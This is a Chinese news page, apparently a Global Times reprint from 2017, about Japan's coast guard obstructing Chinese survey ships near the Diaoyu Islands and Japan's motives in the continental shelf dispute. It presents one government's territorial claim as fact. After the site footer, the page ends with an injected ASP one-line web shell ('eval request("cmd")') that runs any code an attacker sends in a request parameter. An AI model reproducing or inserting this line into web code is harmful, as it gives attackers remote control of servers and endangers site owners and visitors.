大陆新闻

日方阻挠中国调查船在钓鱼岛科考 有啥小九九?

时间:2017-7-5 22:49:00  作者:  来源:环球时报  查看:101  评论:0
内容摘要:报道称,这是连续两天在“日本专属经济区”水域发现中国船只进行海洋调查。日本海上保安厅的飞机通过无线电呼喊“未经允许不得擅自进行作业”,要求中国船只停止活动。我国海洋调查船在钓鱼岛海域进行科学考察,经常遭到日方的无理阻挠和&ldquo...

报道称,这是连续两天在“日本专属经济区”水域发现中国船只进行海洋调查。日本海上保安厅的飞机通过无线电呼喊“未经允许不得擅自进行作业”,要求中国船只停止活动。


我国海洋调查船在钓鱼岛海域进行科学考察,经常遭到日方的无理阻挠和“警告”。今年6月13日,“勘407”号在钓鱼岛海域科考时也遭到日方阻挠。对中国海洋科考船的海洋调查活动,日本还曾通过外交渠道向中方提出交涉。在这一问题上,中国外交部多次明确表示,钓鱼岛及其附属岛屿自古以来就是中国的固有领土,中方不会接受日方以“钓鱼岛是日本领土”为前提进行的任何交涉。

日本之所以对中国海洋调查船的科考活动加以阻挠,从《朝日新闻》近期的报道中可以获知一些原因。该报道称,日本认为中国正在用海洋调查船进行地质调查。日方看到在2012年12月中国向联合国大陆架界限委员会提交大陆架自然延伸至冲绳海槽的划界案,主张的划界范围包括钓鱼岛在内。作为对策,日本打算在2019年联合国大陆架界限委员会审议中国的大陆架延伸案时,能够拿出推翻中国主张的材料。现在,日方一方面阻挠中国的海洋调查,一方面增加财政预算打造海上保安厅的最新型海洋测量船,以和中国的海洋调查对抗。

 

日方阻挠中国调查船在钓鱼岛科考_有啥小九九?

相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):